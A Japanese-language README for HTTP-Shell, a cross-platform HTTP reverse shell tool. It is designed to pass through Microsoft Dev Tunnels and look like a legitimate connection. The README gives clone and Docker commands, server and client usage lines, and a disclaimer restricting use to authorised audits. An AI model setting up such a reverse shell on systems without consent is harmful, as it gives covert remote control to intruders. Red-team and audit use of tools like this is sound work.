
マルチプラットフォーム対応のHTTPリバースシェルで、HTTP上でシェルライクなインターフェースを提供します。ファイルのアップロード/ダウンロード、コマンド履歴、自動再接続、sudo対応を備え、Microsoft Dev Tunnelsとの併用を想定して設計されています。

HTTP-Shell はマルチプラットフォーム対応のリバースシェルです。このツールは、HTTP経由のリバース接続上でシェルライクなインターフェースを取得するのに役立ちます。他のリバースシェルとは異なり、このツールの主な目的は、Microsoft Dev Tunnelsと組み合わせて使用し、正規の接続に可能な限り近い接続を実現することです。
このシェルは完全なインタラクティブシェルではありませんが、画面上にエラーを表示し(WindowsとLinuxの両方)、ファイルのアップロード・ダウンロード、コマンド履歴、端末クリア(CTRL+Lも可)、自動再接続、ディレクトリ間の移動、LinuxベースのOSでのsudo(またはsudo su)をサポートしています。
完全なリポジトリをクローンするか、zipファイルをダウンロードすることをお勧めします。以下のコマンドを実行して行えます:
git clone https://github.com/JoelGMSec/HTTP-Shell
# Server
_ _ _____ _____ ____ ____ _ _ _
| | | |_ _|_ _| _ \ / ___|| |__ ___| | |
| |_| | | | | | | |_) |___\___ \| "_ \ / _ \ | |
| _ | | | | | | __/_____|__) | | | | __/ | |
|_| |_| |_| |_| |_| |____/|_| |_|\___|_|_|
---------------- by @JoelGMSec -----------------
[!] Usage: HTTP-Server.py [PORT]
# Linux CLI
[!] Usage: ./HTTP-Client.sh -c [HOST:PORT] -s [SLEEP] (optional)
# Windows CLI
[!] Usage: .\HTTP-Client.ps1 -c [HOST:PORT] -s [SLEEP] (optional)
Dockerコンテナでサーバーを実行したい場合:
docker build -t http-shell https://github.com/JoelGMSec/HTTP-Shell.git#main
docker run -it --rm -p 8080:8080 --name http-shell http-shell
https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels
このプロジェクトはGNU 3.0ライセンスの下でライセンスされています。詳細についてはLICENSEファイルを参照してください。
元のアイデアと一部のコードはHéctor de Armas Padrón (@3v4si0n)によるものです。
このツールはJoel Gámez Molina (@JoelGMSec)によって一から作成・設計されました。
このソフトウェアはいかなる種類の保証も提供しません。その使用は教育環境および/またはクライアントの適切な同意を得たセキュリティ監査に限定されます。誤用やそれによって生じた損害については一切の責任を負いません。
詳細については、Twitterの@JoelGMSecまたはブログdarkbyte.netでご連絡ください。
コーヒーを一杯ご馳走していただけると、私の活動を支援できます: